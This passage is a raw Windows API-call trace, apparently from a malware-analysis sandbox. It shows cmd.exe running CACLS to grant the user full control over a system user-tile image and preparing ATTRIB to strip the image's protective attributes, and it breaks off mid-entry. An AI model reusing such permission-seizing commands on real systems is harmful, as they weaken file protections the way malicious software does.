[0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x0, lpData=0x18ebc0*=0x40, lpcbData=0x18ebb8*=0x1000) returned 0x2 [0188.131] RegCloseKey (hKey=0x40) returned 0x0 [0188.131] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ebb4 | out: phkResult=0x18ebb4*=0x40) returned 0x0 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x0, lpData=0x18ebc0*=0x40, lpcbData=0x18ebb8*=0x1000) returned 0x2 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x4, lpData=0x18ebc0*=0x1, lpcbData=0x18ebb8*=0x4) returned 0x0 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x0, lpData=0x18ebc0*=0x1, lpcbData=0x18ebb8*=0x1000) returned 0x2 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x4, lpData=0x18ebc0*=0x0, lpcbData=0x18ebb8*=0x4) returned 0x0 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x4, lpData=0x18ebc0*=0x9, lpcbData=0x18ebb8*=0x4) returned 0x0 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x4, lpData=0x18ebc0*=0x9, lpcbData=0x18ebb8*=0x4) returned 0x0 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x0, lpData=0x18ebc0*=0x9, lpcbData=0x18ebb8*=0x1000) returned 0x2 [0188.131] RegCloseKey (hKey=0x40) returned 0x0 [0188.131] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886396 [0188.131] srand (_Seed=0x5b886396) [0188.131] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"" [0188.131] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"" [0188.131] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0188.132] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2f1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0188.132] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0188.132] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0188.132] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0188.132] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0188.132] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0188.132] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0188.132] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0188.132] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0188.132] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0188.132] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0188.132] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0188.132] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0188.132] GetEnvironmentStringsW () returned 0x2f2458* [0188.133] FreeEnvironmentStringsW (penv=0x2f2458) returned 1 [0188.133] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.133] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0188.133] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0188.133] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0188.133] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0188.133] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0188.133] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0188.133] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0188.133] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0188.133] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0188.133] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f980 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0188.133] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f980, lpFilePart=0x18f97c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f97c*="Desktop") returned 0x18 [0188.133] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0188.133] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f6fc | out: lpFindFileData=0x18f6fc) returned 0x2f0ae8 [0188.133] FindClose (in: hFindFile=0x2f0ae8 | out: hFindFile=0x2f0ae8) returned 1 [0188.133] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f6fc | out: lpFindFileData=0x18f6fc) returned 0x2f0ae8 [0188.133] FindClose (in: hFindFile=0x2f0ae8 | out: hFindFile=0x2f0ae8) returned 1 [0188.133] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f6fc | out: lpFindFileData=0x18f6fc) returned 0x2f0ae8 [0188.134] FindClose (in: hFindFile=0x2f0ae8 | out: hFindFile=0x2f0ae8) returned 1 [0188.134] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0188.134] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0188.134] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0188.134] GetEnvironmentStringsW () returned 0x2f0308* [0188.134] FreeEnvironmentStringsW (penv=0x2f0308) returned 1 [0188.134] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0188.134] GetConsoleOutputCP () returned 0x1b5 [0188.134] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0188.134] GetUserDefaultLCID () returned 0x409 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fac0, cchData=128 | out: lpLCData="0") returned 2 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fac0, cchData=128 | out: lpLCData="0") returned 2 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fac0, cchData=128 | out: lpLCData="1") returned 2 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0188.135] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0188.135] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0188.136] GetConsoleTitleW (in: lpConsoleTitle=0x2e09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.136] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0188.136] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0188.137] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0188.137] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0188.137] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0188.138] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0188.138] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0188.138] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0188.138] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0188.138] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0188.138] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0188.138] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0188.140] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0188.140] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0188.140] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0188.141] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0188.141] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0188.141] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0188.141] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0188.143] GetConsoleTitleW (in: lpConsoleTitle=0x18f754, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.182] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0188.182] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0188.182] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0188.182] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0188.182] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0188.182] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0188.182] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0188.182] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0188.182] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0188.182] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0188.182] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0188.182] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0188.182] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0188.182] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0188.182] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0188.182] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0188.182] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0188.182] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0188.182] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0188.182] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0188.182] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0188.182] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0188.182] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0188.182] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0188.182] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0188.182] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0188.182] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0188.182] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0188.182] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0188.182] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0188.182] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0188.182] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0188.182] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0188.182] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0188.182] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0188.182] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0188.182] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0188.182] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0188.182] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0188.182] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0188.182] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0188.182] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0188.182] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0188.182] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0188.182] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0188.182] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0188.183] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0188.183] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0188.183] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0188.183] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0188.183] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0188.183] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0188.183] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0188.183] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0188.183] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0188.183] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0188.183] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0188.183] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0188.183] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0188.183] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0188.183] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0188.183] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0188.183] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0188.183] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0188.183] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0188.183] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0188.183] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0188.183] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0188.183] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0188.183] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0188.183] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0188.183] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0188.183] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0188.183] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0188.183] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0188.183] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0188.183] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0188.183] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0188.183] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0188.183] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0188.183] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0188.183] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0188.183] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0188.183] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0188.183] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0188.183] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0188.183] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0188.184] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0188.184] SetErrorMode (uMode=0x0) returned 0x0 [0188.184] SetErrorMode (uMode=0x1) returned 0x0 [0188.184] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2f1e98, lpFilePart=0x18f274 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f274*="Desktop") returned 0x18 [0188.184] SetErrorMode (uMode=0x0) returned 0x1 [0188.184] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0188.184] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0188.189] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0188.190] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0xffffffff [0188.190] GetLastError () returned 0x2 [0188.190] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0xffffffff [0188.190] GetLastError () returned 0x2 [0188.190] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0x2f2180 [0188.190] FindClose (in: hFindFile=0x2f2180 | out: hFindFile=0x2f2180) returned 1 [0188.190] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0xffffffff [0188.191] GetLastError () returned 0x2 [0188.191] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0x2f2180 [0188.191] FindClose (in: hFindFile=0x2f2180 | out: hFindFile=0x2f2180) returned 1 [0188.191] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0188.191] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0188.191] GetConsoleTitleW (in: lpConsoleTitle=0x18f4e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.191] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f370, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f438 | out: lpAttributeList=0x18f370, lpSize=0x18f438) returned 1 [0188.191] UpdateProcThreadAttribute (in: lpAttributeList=0x18f370, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f430, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f370, lpPreviousValue=0x0) returned 1 [0188.191] GetStartupInfoW (in: lpStartupInfo=0x18f32c | out: lpStartupInfo=0x18f32c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0188.191] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0188.192] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f3cc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f418 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x18f418*(hProcess=0x50, hThread=0x4c, dwProcessId=0x80c, dwThreadId=0x9c4)) returned 1 [0188.195] CloseHandle (hObject=0x4c) returned 1 [0188.195] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0188.195] GetEnvironmentStringsW () returned 0x2f0308* [0188.195] FreeEnvironmentStringsW (penv=0x2f0308) returned 1 [0188.195] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0188.454] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18f30c | out: lpExitCode=0x18f30c*=0x0) returned 1 [0188.454] CloseHandle (hObject=0x50) returned 1 [0188.454] _vsnwprintf (in: _Buffer=0x18f454, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f318 | out: _Buffer="00000000") returned 8 [0188.454] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0188.455] GetEnvironmentStringsW () returned 0x2f2410* [0188.455] FreeEnvironmentStringsW (penv=0x2f2410) returned 1 [0188.455] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0188.455] GetEnvironmentStringsW () returned 0x2f2410* [0188.455] FreeEnvironmentStringsW (penv=0x2f2410) returned 1 [0188.455] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f370 | out: lpAttributeList=0x18f370) [0188.455] GetConsoleTitleW (in: lpConsoleTitle=0x18f754, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.455] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0188.455] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0188.455] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0188.455] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0xffffffff [0188.456] GetLastError () returned 0x2 [0188.456] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0xffffffff [0188.456] GetLastError () returned 0x2 [0188.456] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0x2ee4d8 [0188.456] FindClose (in: hFindFile=0x2ee4d8 | out: hFindFile=0x2ee4d8) returned 1 [0188.456] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0xffffffff [0188.456] GetLastError () returned 0x2 [0188.456] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x18eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eff0) returned 0x2ee4d8 [0188.456] FindClose (in: hFindFile=0x2ee4d8 | out: hFindFile=0x2ee4d8) returned 1 [0188.457] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0188.457] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0188.457] GetConsoleTitleW (in: lpConsoleTitle=0x18f4e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.457] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f370, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f438 | out: lpAttributeList=0x18f370, lpSize=0x18f438) returned 1 [0188.457] UpdateProcThreadAttribute (in: lpAttributeList=0x18f370, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f430, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f370, lpPreviousValue=0x0) returned 1 [0188.457] GetStartupInfoW (in: lpStartupInfo=0x18f32c | out: lpStartupInfo=0x18f32c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, 